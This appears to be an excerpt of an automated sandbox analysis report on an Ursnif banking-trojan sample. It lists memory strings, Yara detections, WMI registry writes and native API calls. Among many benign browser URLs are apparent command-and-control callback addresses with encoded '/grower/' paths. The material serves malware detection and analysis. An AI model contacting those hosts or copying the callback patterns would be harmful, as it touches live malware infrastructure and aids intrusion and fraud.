Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.464931301.000001D552DD2000.00000004.00000020.sdmp	String found in binary or memory: http://vuredosite.club/grower/gjRpowobIXSobHjwI2Wv/_2Fg_2FVDgdI_2BsMGm/BfIb8NeDQ0u4hOXuLbcUki/fsX_2F
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.22.dr	String found in binary or memory: http://www.amazon.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.22.dr	String found in binary or memory: http://www.google.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.22.dr	String found in binary or memory: http://www.live.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.22.dr	String found in binary or memory: http://www.nytimes.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.22.dr	String found in binary or memory: http://www.reddit.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.22.dr	String found in binary or memory: http://www.twitter.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.22.dr	String found in binary or memory: http://www.wikipedia.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.22.dr	String found in binary or memory: http://www.youtube.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://ei.rdtcdn.com/www-static/cdn_files/redtube/icons/favicon.png?v=855e9f26de79d21367b6ee4a42556
Source: iexplore.exe, 0000001E.00000002.464931301.000001D552DD2000.00000004.00000020.sdmp	String found in binary or memory: https://login.live.com
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.com/grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2FSXB9
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp, ~DFC3C25805150DF731.TMP.22.dr, {9F4ECD46-DE7D-11EB-90E4-ECF4BB862DED}.dat.22.dr	String found in binary or memory: https://outlook.office365.com/grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: iexplore.exe, 0000001E.00000002.465171579.000001D552E17000.00000004.00000020.sdmp	String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp, iexplore.exe, 0000001E.00000002.480283186.000001D5557CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.outlook.com/grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2F
Source: iexplore.exe, 0000001E.00000002.480050763.000001D555720000.00000004.00000001.sdmp, iexplore.exe, 0000001E.00000002.466280522.000001D552E37000.00000004.00000020.sdmp, iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp, iexplore.exe, 0000001E.00000002.479396698.000001D5550E0000.00000004.00000001.sdmp, iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/(
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/18=q
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/3
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/BbRR
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/V
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/e
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/favicon.icoW
Source: iexplore.exe, 0000001E.00000002.480232372.000001D5557B2000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/mdll
Source: iexplore.exe, 0000001E.00000002.480201993.000001D55579D000.00000004.00000001.sdmp	String found in binary or memory: https://www.redtube.com/zO%F

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.375971100.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375934102.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375882980.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375768564.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375954554.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375906864.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375822644.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.375857537.00000000053D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6760, type: MEMORY

System Summary:

Writes registry values via WMI

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F1996 GetProcAddress,NtCreateSection,memset,		0_2_6E1F1996
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F1A44 NtMapViewOfSection,		0_2_6E1F1A44
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F23A5 NtQueryVirtualMemory,		0_2_6E1F23A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BA5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,		0_2_02BA5A27
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BAB1A5 NtQueryVirtualMemory,		0_2_02BAB1A5

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1F2184		0_2_6E1F2184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BA888E		0_2_02BA888E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BA3EE1		0_2_02BA3EE1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02BAAF80		0_2_02BAAF80
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E2117B0		0_2_6E2117B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E224E00		0_2_6E224E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E22BE61		0_2_6E22BE61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E220DB8		0_2_6E220DB8
